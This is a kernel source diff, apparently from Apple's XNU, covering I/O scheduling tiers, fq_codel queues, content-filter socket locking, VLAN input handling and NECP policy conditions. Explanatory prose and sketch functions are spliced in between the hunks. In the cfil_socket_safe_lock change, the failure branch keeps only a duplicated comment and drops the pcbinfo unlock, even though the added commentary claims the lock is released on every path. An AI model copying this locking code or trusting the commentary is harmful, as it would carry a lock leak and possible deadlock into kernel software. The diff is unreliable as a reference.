        if (bap->ba_flags & BA_META) {
                if ((mp && (mp->mnt_ioflags & MNT_IOFLAGS_IOSCHED_SUPPORTED)) || (bap->ba_flags & BA_IO_SCHEDULED)) {
                        if (bp->b_flags & B_READ) {
-                               if (io_tier > IOSCHED_METADATA_TIER) {
+                               if ((bap->ba_flags & BA_EXPEDITED_META_IO) && (io_tier > IOSCHED_METADATA_EXPEDITED_TIER)) {
+                                       io_tier = IOSCHED_METADATA_EXPEDITED_TIER;
+                                       passive = 1;
+                               } else if (io_tier > IOSCHED_METADATA_TIER) {
                                        io_tier = IOSCHED_METADATA_TIER;
                                        passive = 1;
                                }
                        } else {
-                               io_tier = IOSCHED_METADATA_TIER;
+                               if (bap->ba_flags & BA_EXPEDITED_META_IO) {
+                                       io_tier = IOSCHED_METADATA_EXPEDITED_TIER;
+                               } else {
+                                       io_tier = IOSCHED_METADATA_TIER;
+                               }
                                passive = 1;
                        }
                }
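The comment and branches above amount to a small clamping rule. Restated as a standalone helper purely for illustration (the function name is invented; the passive marking done in the original code is omitted):

/* Illustration: the effective tier chosen for a metadata I/O. */
static int
meta_io_tier(int io_tier, bool is_read, bool expedited)
{
        int tier = expedited ? IOSCHED_METADATA_EXPEDITED_TIER : IOSCHED_METADATA_TIER;

        if (is_read) {
                /* Reads are only capped; an already-better tier is kept. */
                return (io_tier > tier) ? tier : io_tier;
        }
        /* Writes are forced onto the chosen metadata tier unconditionally. */
        return tier;
}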
@@ -2591,6 +2596,9 @@ spec_strategy(struct vnop_strategy_args *ap)
                    buf_kernel_addrperm_addr(bp), bdev, buf_blkno(bp), buf_count(bp), 0);
        }
 
+#if CONFIG_IO_COMPRESSION_STATS
+       io_compression_stats(bp);
+#endif /* CONFIG_IO_COMPRESSION_STATS */
        thread_update_io_stats(current_thread(), buf_count(bp), code);
 
        if (mp != NULL) {
index 1ec52efea2e1d0e03a59a79db258e940f07bfbe7..a3cd15205547f5181ea0fb44a1d67640a3714318 100644 (file)
@@ -93,6 +93,11 @@ typedef struct classq_pkt {
 #define CLASSQ_PKT_INITIALIZER(_p)      \
        (classq_pkt_t){ .cp_mbuf = NULL, .cp_ptype = QP_INVALID }
 
+#define CLASSQ_PKT_INIT(_p)    do {    \
+       (_p)->cp_ptype = QP_INVALID;   \
+       (_p)->cp_mbuf = NULL;          \
+} while (0)
+
 #define CLASSQ_PKT_INIT_MBUF(_p, _m)    do {    \
        (_p)->cp_ptype = QP_MBUF;               \
        (_p)->cp_mbuf = (_m);                   \
@@ -183,6 +188,9 @@ typedef struct _class_queue_ {
 #define CLASSQF_ECN     (CLASSQF_ECN4 | CLASSQF_ECN6)
 
 extern u_int32_t classq_verbose;
+#if DEBUG || DEVELOPMENT
+extern uint16_t fq_codel_quantum;
+#endif /* DEBUG || DEVELOPMENT */
 
 SYSCTL_DECL(_net_classq);
 
index f587e768971dd8a9683ae403df30ffe69b27e601..e78ceefdf2d46392a3d26be9e51927ca41267cea 100644 (file)
@@ -97,12 +97,16 @@ fq_alloc(classq_pkt_type_t ptype)
        if (ptype == QP_MBUF) {
                MBUFQ_INIT(&fq->fq_mbufq);
        }
+       CLASSQ_PKT_INIT(&fq->fq_dq_head);
+       CLASSQ_PKT_INIT(&fq->fq_dq_tail);
+       fq->fq_in_dqlist = false;
        return fq;
 }
 
 void
 fq_destroy(fq_t *fq)
 {
+       VERIFY(fq->fq_flags & FQF_DESTROYED);
        VERIFY(fq_empty(fq));
        VERIFY(!(fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)));
        VERIFY(fq->fq_bytes == 0);
@@ -127,6 +131,10 @@ fq_detect_dequeue_stall(fq_if_t *fqs, fq_t *flowq, fq_if_classq_t *fq_cl,
                 */
                FQ_SET_DELAY_HIGH(flowq);
                fq_cl->fcl_stat.fcl_dequeue_stall++;
+               os_log_error(OS_LOG_DEFAULT, "%s: dequeue stall num: %d, "
+                   "scidx: %d, flow: 0x%x, iface: %s", __func__,
+                   fq_cl->fcl_stat.fcl_dequeue_stall, flowq->fq_sc_index,
+                   flowq->fq_flowhash, if_name(fqs->fqs_ifq->ifcq_ifp));
        }
 }
 
@@ -314,8 +322,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl)
 
        /* Set the return code correctly */
        if (__improbable(fc_adv == 1 && droptype != DTYPE_FORCED)) {
-               if (fq_if_add_fcentry(fqs, pkt, pkt_flowid, pkt_flowsrc,
-                   fq_cl)) {
+               if (fq_if_add_fcentry(fqs, pkt, pkt_flowsrc, fq, fq_cl)) {
                        fq->fq_flags |= FQF_FLOWCTL_ON;
                        /* deliver flow control advisory error */
                        if (droptype == DTYPE_NODROP) {
@@ -375,7 +382,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl)
                                 */
                                if (fq_empty(fq) && !(fq->fq_flags &
                                    (FQF_NEW_FLOW | FQF_OLD_FLOW))) {
-                                       fq_if_destroy_flow(fqs, fq_cl, fq);
+                                       fq_if_destroy_flow(fqs, fq_cl, fq, true);
                                        fq = NULL;
                                }
                        } else {
@@ -509,6 +516,11 @@ fq_getq_flow(fq_if_t *fqs, fq_t *fq, pktsched_pkt_t *pkt)
                if (fq->fq_min_qdelay > fqs->fqs_target_qdelay) {
                        if (!FQ_IS_DELAYHIGH(fq)) {
                                FQ_SET_DELAY_HIGH(fq);
+                               os_log_error(OS_LOG_DEFAULT,
+                                   "%s: high delay idx: %d, %llu, flow: 0x%x, "
+                                   "iface: %s", __func__, fq->fq_sc_index,
+                                   fq->fq_min_qdelay, fq->fq_flowhash,
+                                   if_name(fqs->fqs_ifq->ifcq_ifp));
                        }
                } else {
                        FQ_CLEAR_DELAY_HIGH(fq);
index b8c4d10beb1f5600f0ebf1ed32060da035f17709..e2f0114f15446d34ba40088994948dbf1182dc8f 100644 (file)
@@ -57,9 +57,10 @@ typedef struct flowq {
 #define FQF_NEW_FLOW    0x04    /* Currently on new flows queue */
 #define FQF_OLD_FLOW    0x08    /* Currently on old flows queue */
 #define FQF_FLOWCTL_ON  0x10    /* Currently flow controlled */
+#define FQF_DESTROYED   0x80    /* flowq destroyed */
        uint8_t        fq_flags;       /* flags */
        uint8_t        fq_sc_index; /* service_class index */
-       int16_t         fq_deficit;     /* Deficit for scheduling */
+       int32_t        fq_deficit;     /* Deficit for scheduling */
        uint32_t       fq_bytes;       /* Number of bytes in the queue */
        uint64_t       fq_min_qdelay; /* min queue delay for Codel */
        uint64_t       fq_updatetime; /* next update interval */
@@ -68,6 +69,11 @@ typedef struct flowq {
        STAILQ_ENTRY(flowq) fq_actlink; /* for new/old flow queues */
        uint32_t       fq_flowhash;    /* Flow hash */
        classq_pkt_type_t       fq_ptype; /* Packet type */
+       /* temporary packet queue for dequeued packets */
+       classq_pkt_t   fq_dq_head;
+       classq_pkt_t   fq_dq_tail;
+       STAILQ_ENTRY(flowq) fq_dqlink; /* entry on dequeue flow list */
+       bool           fq_in_dqlist;
 } fq_t;
 
 #define fq_mbufq        __fq_pktq_u.__mbufq
index d18e9c7670f25559dbfa0fb4864336b69785a282..d35cf2fa0aab9e1e7fc07393f9a7afa854e24507 100644 (file)
@@ -64,13 +64,29 @@ SYSCTL_QUAD(_net_classq, OID_AUTO, update_interval,
     CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_update_interval,
     "update interval in nanoseconds");
 
+#if DEBUG || DEVELOPMENT
+uint32_t ifclassq_flow_control_adv = 1; /* flow control advisory */
+SYSCTL_UINT(_net_classq, OID_AUTO, flow_control_adv,
+    CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_flow_control_adv, 1,
+    "enable/disable flow control advisory");
+
+uint16_t fq_codel_quantum = 0;
+#endif /* DEBUG || DEVELOPMENT */
+
 void
 classq_init(void)
 {
        _CASSERT(MBUF_TC_BE == 0);
        _CASSERT(MBUF_SC_BE == 0);
        _CASSERT(IFCQ_SC_MAX == MBUF_SC_MAX_CLASSES);
-
+#if DEBUG || DEVELOPMENT
+       PE_parse_boot_argn("fq_codel_quantum", &fq_codel_quantum,
+           sizeof(fq_codel_quantum));
+       PE_parse_boot_argn("ifclassq_target_qdelay", &ifclassq_target_qdelay,
+           sizeof(ifclassq_target_qdelay));
+       PE_parse_boot_argn("ifclassq_update_interval",
+           &ifclassq_update_interval, sizeof(ifclassq_update_interval));
+#endif /* DEBUG || DEVELOPMENT */
        fq_codel_init();
 }
 
index 15e6b6bb45e7349a3e305113bdac9cfd8d09644a..51f7993dafe442c149709e57193aa6d24574ef00 100644 (file)
@@ -100,6 +100,10 @@ struct ifclassq;
 enum cqdq_op;
 enum cqrq;
 
+#if DEBUG || DEVELOPMENT
+extern uint32_t ifclassq_flow_control_adv;
+#endif /* DEBUG || DEVELOPMENT */
+
 typedef int (*ifclassq_enq_func)(struct ifclassq *, classq_pkt_t *,
     boolean_t *);
 typedef void  (*ifclassq_deq_func)(struct ifclassq *, classq_pkt_t *);
index 7617e7757fac51fda31126a25d37c3ba1393f49d..e33a2a4086ef4053684cd72f97d15ea7a3095d26 100644 (file)
@@ -1605,45 +1605,39 @@ cfil_sock_id_from_socket(struct socket *so)
        }
 }
 
-static bool
-cfil_socket_safe_lock(struct inpcb *inp)
-{
-       if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) {
-               socket_lock(inp->inp_socket, 1);
-               if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) {
-                       return true;
-               }
-               socket_unlock(inp->inp_socket, 1);
-       }
-       return false;
-}
-
 /*
- * cfil_socket_safe_lock_rip -
- * This routine attempts to lock the rip socket safely.
- * The passed in ripcbinfo is assumed to be locked and must be unlocked (regardless
- * of success/failure) before calling socket_unlock().  This is to avoid double
- * locking since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when
+ * cfil_socket_safe_lock -
+ * This routine attempts to lock the socket safely.
+ *
+ * The passed in pcbinfo is assumed to be locked and must be unlocked once the
+ * inp state is safeguarded and before we attempt to lock/unlock the socket.
+ * This is to prevent getting blocked by socket_lock() while holding the pcbinfo
+ * lock, avoiding potential deadlock with other processes contending for the same
+ * resources.  This is also to avoid double locking the pcbinfo for rip sockets
+ * since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when
  * so_usecount is 0.
  */
 static bool
-cfil_socket_safe_lock_rip(struct inpcb *inp, struct inpcbinfo *pcbinfo)
+cfil_socket_safe_lock(struct inpcb *inp, struct inpcbinfo *pcbinfo)
 {
        struct socket *so = NULL;
 
        VERIFY(pcbinfo != NULL);
 
        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) {
+               // Safeguarded the inp state, unlock pcbinfo before locking socket.
+               lck_rw_done(pcbinfo->ipi_lock);
+
                so = inp->inp_socket;
                socket_lock(so, 1);
                if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) {
-                       lck_rw_done(pcbinfo->ipi_lock);
                        return true;
                }
+       } else {
+               // Failed to safeguarded the inp state, unlock pcbinfo and abort.
+               // Failed to safeguard the inp state; unlock pcbinfo and abort.
        }
 
-       lck_rw_done(pcbinfo->ipi_lock);
-
        if (so) {
                socket_unlock(so, 1);
        }
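With this change cfil_socket_safe_lock() consumes the pcbinfo lock on every path, so its callers (rewritten in the hunks below) can no longer break out of their pcb-list walk and fall through to a second lck_rw_done(); they jump straight to their done label instead. A condensed sketch of the calling convention, with the lookup key reduced to a flow-hash compare (the function name is illustrative):

/* Sketch: locate a socket by flow hash under the new locking convention. */
static struct socket *
cfil_find_socket_sketch(struct inpcbinfo *pcbinfo, u_int32_t flowhash)
{
        struct inpcb *inp = NULL;
        struct socket *so = NULL;

        lck_rw_lock_shared(pcbinfo->ipi_lock);
        LIST_FOREACH(inp, pcbinfo->ipi_listhead, inp_list) {
                if (inp->inp_flowhash == flowhash) {
                        if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;   /* locked on success */
                        }
                        /* ipi_lock was released inside the call, success or
                         * not, so stop iterating and do not unlock again. */
                        return so;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
        return NULL;
}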
@@ -1675,10 +1669,11 @@ cfil_socket_from_sock_id(cfil_sock_id_t cfil_sock_id, bool udp_only)
                    inp->inp_flowhash == flowhash &&
                    (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt &&
                    inp->inp_socket->so_cfil != NULL) {
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -1695,10 +1690,11 @@ find_udp:
                    inp->inp_socket != NULL &&
                    inp->inp_socket->so_cfil_db != NULL &&
                    (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) {
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -1713,7 +1709,7 @@ find_udp:
                    inp->inp_socket != NULL &&
                    inp->inp_socket->so_cfil_db != NULL &&
                    (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) {
-                       if (cfil_socket_safe_lock_rip(inp, pcbinfo)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
                        /* pcbinfo is already unlocked, we are done. */
@@ -1746,10 +1742,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached)
                    inp->inp_socket != NULL &&
                    uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) {
                        *cfil_attached = (inp->inp_socket->so_cfil != NULL);
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -1764,10 +1761,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached)
                    inp->inp_socket != NULL &&
                    uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) {
                        *cfil_attached = (inp->inp_socket->so_cfil_db != NULL);
-                       if (cfil_socket_safe_lock(inp)) {
+                       if (cfil_socket_safe_lock(inp, pcbinfo)) {
                                so = inp->inp_socket;
                        }
-                       break;
+                       /* pcbinfo is already unlocked, we are done. */
+                       goto done;
                }
        }
        lck_rw_done(pcbinfo->ipi_lock);
@@ -4265,6 +4263,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3
        struct cfil_entry *entry;
        struct cfe_buf *entrybuf;
        struct cfil_queue *pending_q;
+       struct cfil_entry *iter_entry = NULL;
 
        CFIL_LOG(LOG_INFO, "so %llx kcunit %u outgoing %d",
            (uint64_t)VM_KERNEL_ADDRPERM(so), kcunit, outgoing);
@@ -4282,13 +4281,25 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3
 
        passlen = entrybuf->cfe_pass_offset - pending_q->q_start;
 
+       if (cfil_queue_empty(pending_q)) {
+               for (iter_entry = SLIST_NEXT(entry, cfe_order_link);
+                   iter_entry != NULL;
+                   iter_entry = SLIST_NEXT(iter_entry, cfe_order_link)) {
+                       error = cfil_data_service_ctl_q(so, cfil_info, CFI_ENTRY_KCUNIT(cfil_info, iter_entry), outgoing);
+                       /* 0 means passed so we can continue */
+                       if (error != 0) {
+                               break;
+                       }
+               }
+               goto done;
+       }
+
        /*
         * Locate the chunks of data that we can pass to the next filter
         * A data chunk must be on mbuf boundaries
         */
        curlen = 0;
        while ((data = cfil_queue_first(pending_q)) != NULL) {
-               struct cfil_entry *iter_entry;
                datalen = cfil_data_length(data, NULL, NULL);
 
 #if DATA_DEBUG
@@ -4334,6 +4345,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3
                }
        }
 
+done:
        CFIL_INFO_VERIFY(cfil_info);
 
        return error;
@@ -7194,6 +7206,13 @@ cfil_info_udp_expire(void *v, wait_result_t w)
                cfil_info_log(LOG_ERR, cfil_info, "CFIL: LIFECYCLE: GC CLEAN UP");
 #endif
 
+               for (int kcunit = 1; kcunit <= MAX_CONTENT_FILTER; kcunit++) {
+                       /* Let the filters know of the closing */
+                       if (cfil_dispatch_closed_event(so, cfil_info, kcunit) != 0) {
+                               goto unlock;
+                       }
+               }
+
                cfil_db_delete_entry(db, hash_entry);
                CFIL_INFO_FREE(cfil_info);
                OSIncrementAtomic(&cfil_stats.cfs_sock_detached);
index b58785c17c314cf8c85bb3b5bfeac44d82887ea6..da376cb11b1b162908df737733c67cee6174fc9f 100644 (file)
@@ -4838,7 +4838,19 @@ skip_clat:
                        }
                        goto next;
                }
-               if ((m->m_flags & M_PROMISC) != 0) {
+               /*
+                * A VLAN interface receives VLAN-tagged packets by attaching
+                * its PF_VLAN protocol to a parent interface. When a VLAN
+                * interface is a member of a bridge, the parent interface
+                * receives VLAN-tagged M_PROMISC packets. A VLAN-tagged
+                * M_PROMISC packet must be processed by the VLAN protocol
+                * so that it can be sent up the stack via
+                * dlil_input_packet_list(). That allows the bridge interface's
+                * input filter, attached to the VLAN interface, to process
+                * the packet.
+                */
+               if (protocol_family != PF_VLAN &&
+                   (m->m_flags & M_PROMISC) != 0) {
                        m_freem(m);
                        goto next;
                }
@@ -5319,8 +5331,7 @@ preout_again:
                if ((raw != 0) && (ifp->if_family == IFNET_FAMILY_ETHERNET)) {
                        uint8_t vlan_encap_len = 0;
 
-                       if ((old_proto_family == PF_VLAN) &&
-                           ((m->m_pkthdr.csum_flags & CSUM_VLAN_TAG_VALID) == 0)) {
+                       if ((m->m_pkthdr.csum_flags & CSUM_VLAN_ENCAP_PRESENT) != 0) {
                                vlan_encap_len = ETHER_VLAN_ENCAP_LEN;
                        }
                        m->m_pkthdr.pkt_hdr = mtod(m, char *) + ETHER_HDR_LEN + vlan_encap_len;
index 7cba0957a5833638a5de67ab29cca7b5411864e0..5001ef7d031047f8fe3bfcc72778d5f4a81223a5 100644 (file)
@@ -1137,6 +1137,7 @@ vlan_output(struct ifnet * ifp, struct mbuf * m)
                        m->m_pkthdr.csum_tx_start += ETHER_VLAN_ENCAP_LEN;
                        m->m_pkthdr.csum_tx_stuff += ETHER_VLAN_ENCAP_LEN;
                }
+               m->m_pkthdr.csum_flags |= CSUM_VLAN_ENCAP_PRESENT;
        }
 
        err = dlil_output(p, PF_VLAN, m, NULL, NULL, 1, &adv);
index c8a364c86124ecb246beb305a75531ec6f499fe3..9914747dfc866962f6a27125f4c62c9c4699d045 100644 (file)
@@ -49,7 +49,6 @@ struct sockopt;
 struct inpcb;
 
 /* Private, internal implementation functions */
-extern void     sflt_init(void);
 extern int      sflt_permission_check(struct inpcb *inp);
 extern void     sflt_initsock(struct socket *so);
 extern void     sflt_termsock(struct socket *so);
index a06dc3914133efd2a11e1c66f3d7e90a8a826852..9948ac719f7987b06989cb0de3e3b9108ab8922d 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2013-2020 Apple Inc. All rights reserved.
+ * Copyright (c) 2013-2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -67,6 +67,7 @@
 #include <corecrypto/cchmac.h>
 #include <corecrypto/ccsha2.h>
 #include <os/refcnt.h>
+#include <mach-o/loader.h>
 #include <net/network_agent.h>
 #include <net/necp.h>
 #include <netinet/flow_divert_proto.h>
 u_int32_t necp_drop_all_order = 0;
 u_int32_t necp_drop_all_level = 0;
 
-#define NECP_LOOPBACK_PASS_ALL         1  // Pass all loopback traffic
-#define NECP_LOOPBACK_PASS_WITH_FILTER 2  // Pass all loopback traffic, but activate content filter and/or flow divert if applicable
-
-#if defined(XNU_TARGET_OS_OSX)
-#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_WITH_FILTER
-#else
-#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_ALL
-#endif
-
-u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_DEFAULT;
+u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_ALL;
 u_int32_t necp_pass_keepalives = 1; // 0=Off, 1=On
 u_int32_t necp_pass_interpose = 1; // 0=Off, 1=On
 u_int32_t necp_restrict_multicast = 1; // 0=Off, 1=On
@@ -251,6 +243,7 @@ ZONE_DECLARE(necp_ip_policy_zone, "necp_ip_policy",
 #define NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER                0x10000000
 #define NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS                0x20000000
 #define NECP_KERNEL_CONDITION_IS_LOOPBACK                       0x40000000
+#define NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY       0x80000000
 
 #define NECP_MAX_POLICY_RESULT_SIZE                                     512
 #define NECP_MAX_ROUTE_RULES_ARRAY_SIZE                         1024
@@ -301,6 +294,7 @@ static TAILQ_HEAD(_necp_session_list, necp_session) necp_session_list;
 
 struct necp_socket_info {
        pid_t pid;
+       int32_t pid_version;
        uid_t uid;
        union necp_sockaddr_union local_addr;
        union necp_sockaddr_union remote_addr;
@@ -318,7 +312,9 @@ struct necp_socket_info {
        unsigned is_platform_binary : 1;
        unsigned used_responsible_pid : 1;
        unsigned is_loopback : 1;
-       unsigned __pad_bits : 4;
+       unsigned real_is_platform_binary : 1;
+       unsigned is_delegated : 1;
+       unsigned __pad_bits : 6;
 };
 
 static  lck_grp_attr_t  *necp_kernel_policy_grp_attr    = NULL;
@@ -409,7 +405,7 @@ static bool necp_policy_mark_all_for_deletion(struct necp_session *session);
 static bool necp_policy_delete(struct necp_session *session, struct necp_session_policy *policy);
 static void necp_policy_apply_all(struct necp_session *session);
 
-static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter);
+static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, int32_t cond_pidversion, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter);
 static bool necp_kernel_socket_policy_delete(necp_kernel_policy_id policy_id);
 static bool necp_kernel_socket_policies_reprocess(void);
 static bool necp_kernel_socket_policies_update_uuid_table(void);
@@ -450,6 +446,7 @@ static struct necp_uuid_id_mapping *necp_uuid_lookup_service_id_locked(uuid_t uu
 static struct necp_uuid_id_mapping *necp_uuid_lookup_uuid_with_service_id_locked(u_int32_t local_id);
 static u_int32_t necp_create_uuid_service_id_mapping(uuid_t uuid);
 static bool necp_remove_uuid_service_id_mapping(uuid_t uuid);
+static bool necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id);
 
 struct necp_string_id_mapping {
        LIST_ENTRY(necp_string_id_mapping) chain;
@@ -479,7 +476,8 @@ static bool necp_update_qos_marking(struct ifnet *ifp, u_int32_t route_rule_id);
 struct necp_route_rule {
        LIST_ENTRY(necp_route_rule) chain;
        u_int32_t       id;
-       u_int32_t       default_action;
+       u_int32_t       netagent_id;
+       u_int8_t        default_action;
        u_int8_t        cellular_action;
        u_int8_t        wifi_action;
        u_int8_t        wired_action;
@@ -493,6 +491,7 @@ static LIST_HEAD(necp_route_rule_list, necp_route_rule) necp_route_rules;
 static u_int32_t necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_array, u_int32_t route_rules_array_size);
 static bool necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_id);
 static bool necp_route_is_allowed(struct rtentry *route, ifnet_t interface, u_int32_t route_rule_id, u_int32_t *interface_type_denied);
+static uint32_t necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id);
 static struct necp_route_rule *necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route_rule_id);
 static inline void necp_get_parent_cred_result(proc_t proc, struct necp_socket_info *info);
 
@@ -2097,6 +2096,10 @@ necp_policy_condition_is_valid(u_int8_t *buffer, u_int32_t length, u_int8_t poli
                validated = TRUE;
                break;
        }
+       case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: {
+               validated = TRUE;
+               break;
+       }
        default: {
                validated = FALSE;
                break;
@@ -2139,6 +2142,11 @@ necp_policy_route_rule_is_valid(u_int8_t *buffer, u_int32_t length)
                validated = TRUE;
                break;
        }
+       case NECP_ROUTE_RULE_USE_NETAGENT: {
+               u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(buffer, length);
+               validated = (rule_length >= sizeof(uuid_t));
+               break;
+       }
        default: {
                validated = FALSE;
                break;
@@ -2686,7 +2694,7 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                                num_conditions++;
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_PID) {
-                               condition_tlv_length += sizeof(pid_t);
+                               condition_tlv_length += (sizeof(pid_t) + sizeof(int32_t));
                                num_conditions++;
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_UID) {
@@ -2757,6 +2765,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                        if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) {
                                num_conditions++;
                        }
+                       if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+                               num_conditions++;
+                       }
                }
 
                condition_tlv_length += num_conditions * (sizeof(u_int8_t) + sizeof(u_int32_t)); // These are for the condition TLVs. The space for "value" is already accounted for above.
@@ -2838,7 +2849,10 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                                }
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_PID) {
-                               cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(policy->cond_pid), &policy->cond_pid,
+                               uint8_t pid_buffer[sizeof(policy->cond_pid) + sizeof(policy->cond_pid_version)] = { };
+                               memcpy(pid_buffer, &policy->cond_pid, sizeof(policy->cond_pid));
+                               memcpy(pid_buffer + sizeof(policy->cond_pid), &policy->cond_pid_version, sizeof(policy->cond_pid_version));
+                               cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(pid_buffer), &pid_buffer,
                                    cond_buf, condition_tlv_length);
                        }
                        if (condition_mask & NECP_KERNEL_CONDITION_UID) {
@@ -2919,6 +2933,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length)
                        if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) {
                                cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_FLOW_IS_LOOPBACK, 0, "", cond_buf, condition_tlv_length);
                        }
+                       if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+                               cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY, 0, "", cond_buf, condition_tlv_length);
+                       }
                }
 
                cursor = necp_buffer_write_tlv(cursor, NECP_TLV_POLICY_CONDITION, cond_buf_cursor - cond_buf, cond_buf, tlv_buffer, total_allocated_bytes);
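The NECP_POLICY_CONDITION_PID value written here now carries the pid version immediately after the pid. A sketch of the resulting 8-byte payload as a packed struct, for illustration only (the kernel assembles it with memcpy into a byte buffer as shown above); policies that still send only the 4-byte pid continue to parse, with the version left at 0 in the apply-side hunk further below:

/* Illustration of the value layout; not a type the kernel defines. */
struct necp_pid_condition_value {
        pid_t   pid;          /* bytes 0..3 */
        int32_t pid_version;  /* bytes 4..7 */
} __attribute__((packed));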
@@ -3239,6 +3256,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
        char *cond_custom_entitlement = NULL;
        char *cond_signing_identifier = NULL;
        pid_t cond_pid = 0;
+       int32_t cond_pid_version = 0;
        uid_t cond_uid = 0;
        necp_app_id cond_app_id = 0;
